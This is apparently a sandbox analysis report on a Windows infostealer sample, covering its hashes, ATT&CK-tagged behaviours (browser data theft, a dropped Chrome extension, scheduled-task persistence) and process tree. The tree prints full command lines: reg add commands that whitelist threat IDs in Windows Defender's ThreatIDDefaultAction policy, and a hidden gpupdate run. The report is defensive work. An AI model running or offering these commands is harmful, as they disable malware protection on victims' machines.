c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Size

6.6MB
MD5

11070066a80109c22a00ac720006bbaa
SHA1

40158a0a3eb6005cc573903048200a0e436be246
SHA256

c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880
SHA512

3830aff85e7743650a2834dce51965dd1c8e27655664d2a637e6608c7c03f07d186d4af24db37e83dae03c3c3b9a6af2813372e23af0f3dab276a147f516f1e0
SSDEEP

98304:asuaZIj7qC0HX1apUVCvCrgtepFLUiXC2zirJYYdD9acfC7m+uAWUrBscFFK7IjV:lNZIOXAUCo9wJ2mruEscqrWUrc76P

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXE

pid process

640 powershell.exe
4480 powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\manifest.json	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Drops file in System32 directory 3 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Drops file in Program Files directory 14 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\Zzxwcch.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PHshpGZGOCOU2\QXheQpC.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PKitbTPXU\fyhOgKr.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\gIbkOBIdgRUn\JAXmRcx.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\ujRQKhsomqXgC\vNqofae.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PHshpGZGOCOU2\iqpolKpdoetJo.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\XVDPCEF.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\ujRQKhsomqXgC\VYqiblP.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PKitbTPXU\qoKdeJ.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\fErPICTAIBeQfSA.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3792 1604 WerFault.exe 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2908 schtasks.exe
3896 schtasks.exe
2728 schtasks.exe
1552 schtasks.exe
4568 schtasks.exe
2948 schtasks.exe
3644 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\fErPICTAIBeQfSA.job	schtasks.exe

pid	pid_target	process	target process
3792	1604	WerFault.exe	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

pid	process
2908	schtasks.exe
3896	schtasks.exe
2728	schtasks.exe
1552	schtasks.exe
4568	schtasks.exe
2948	schtasks.exe
3644	schtasks.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

pid	process
640	powershell.exe
640	powershell.exe
4564	powershell.exe
4564	powershell.exe
4024	powershell.exe
4024	powershell.exe
4480	powershell.EXE
4480	powershell.EXE
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4480	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 1604 wrote to memory of 3272	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 1604 wrote to memory of 3272	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 1604 wrote to memory of 3272	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 3272 wrote to memory of 4672	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 4672	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 4672	3272	cmd.exe	forfiles.exe
PID 4672 wrote to memory of 2864	4672	forfiles.exe	cmd.exe
PID 4672 wrote to memory of 2864	4672	forfiles.exe	cmd.exe
PID 4672 wrote to memory of 2864	4672	forfiles.exe	cmd.exe
PID 2864 wrote to memory of 1176	2864	cmd.exe	reg.exe
PID 2864 wrote to memory of 1176	2864	cmd.exe	reg.exe
PID 2864 wrote to memory of 1176	2864	cmd.exe	reg.exe
PID 3272 wrote to memory of 3036	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 3036	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 3036	3272	cmd.exe	forfiles.exe
PID 3036 wrote to memory of 1320	3036	forfiles.exe	cmd.exe
PID 3036 wrote to memory of 1320	3036	forfiles.exe	cmd.exe
PID 3036 wrote to memory of 1320	3036	forfiles.exe	cmd.exe
PID 1320 wrote to memory of 5048	1320	cmd.exe	reg.exe
PID 1320 wrote to memory of 5048	1320	cmd.exe	reg.exe
PID 1320 wrote to memory of 5048	1320	cmd.exe	reg.exe
PID 3272 wrote to memory of 4192	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 4192	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 4192	3272	cmd.exe	forfiles.exe
PID 4192 wrote to memory of 2980	4192	forfiles.exe	cmd.exe
PID 4192 wrote to memory of 2980	4192	forfiles.exe	cmd.exe
PID 4192 wrote to memory of 2980	4192	forfiles.exe	cmd.exe
PID 2980 wrote to memory of 4528	2980	cmd.exe	reg.exe
PID 2980 wrote to memory of 4528	2980	cmd.exe	reg.exe
PID 2980 wrote to memory of 4528	2980	cmd.exe	reg.exe
PID 3272 wrote to memory of 3792	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 3792	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 3792	3272	cmd.exe	forfiles.exe
PID 3792 wrote to memory of 2176	3792	forfiles.exe	cmd.exe
PID 3792 wrote to memory of 2176	3792	forfiles.exe	cmd.exe
PID 3792 wrote to memory of 2176	3792	forfiles.exe	cmd.exe
PID 2176 wrote to memory of 3608	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3608	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 3608	2176	cmd.exe	reg.exe
PID 3272 wrote to memory of 1540	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 1540	3272	cmd.exe	forfiles.exe
PID 3272 wrote to memory of 1540	3272	cmd.exe	forfiles.exe
PID 1540 wrote to memory of 1504	1540	forfiles.exe	cmd.exe
PID 1540 wrote to memory of 1504	1540	forfiles.exe	cmd.exe
PID 1540 wrote to memory of 1504	1540	forfiles.exe	cmd.exe
PID 1504 wrote to memory of 640	1504	cmd.exe	powershell.exe
PID 1504 wrote to memory of 640	1504	cmd.exe	powershell.exe
PID 1504 wrote to memory of 640	1504	cmd.exe	powershell.exe
PID 1604 wrote to memory of 4564	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	powershell.exe
PID 1604 wrote to memory of 4564	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	powershell.exe
PID 1604 wrote to memory of 4564	1604	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	powershell.exe
PID 640 wrote to memory of 3780	640	powershell.exe	gpupdate.exe
PID 640 wrote to memory of 3780	640	powershell.exe	gpupdate.exe
PID 640 wrote to memory of 3780	640	powershell.exe	gpupdate.exe
PID 4564 wrote to memory of 4708	4564	powershell.exe	cmd.exe
PID 4564 wrote to memory of 4708	4564	powershell.exe	cmd.exe
PID 4564 wrote to memory of 4708	4564	powershell.exe	cmd.exe
PID 4708 wrote to memory of 4236	4708	cmd.exe	reg.exe
PID 4708 wrote to memory of 4236	4708	cmd.exe	reg.exe
PID 4708 wrote to memory of 4236	4708	cmd.exe	reg.exe
PID 4564 wrote to memory of 3552	4564	powershell.exe	reg.exe
PID 4564 wrote to memory of 3552	4564	powershell.exe	reg.exe
PID 4564 wrote to memory of 3552	4564	powershell.exe	reg.exe
PID 4564 wrote to memory of 3056	4564	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:3272

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2864

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:1176

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:1320

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:5048

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:4192

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2980

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:4528

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2176

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:3608

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:3780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- Suspicious use of WriteProcessMemory
PID:4708

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:3552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:2944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:4184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
